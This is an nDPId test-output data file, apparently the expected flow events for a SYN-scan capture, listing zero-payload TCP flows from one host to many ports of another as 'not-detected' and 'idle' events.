-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":64623,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":825,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1147,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1857,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 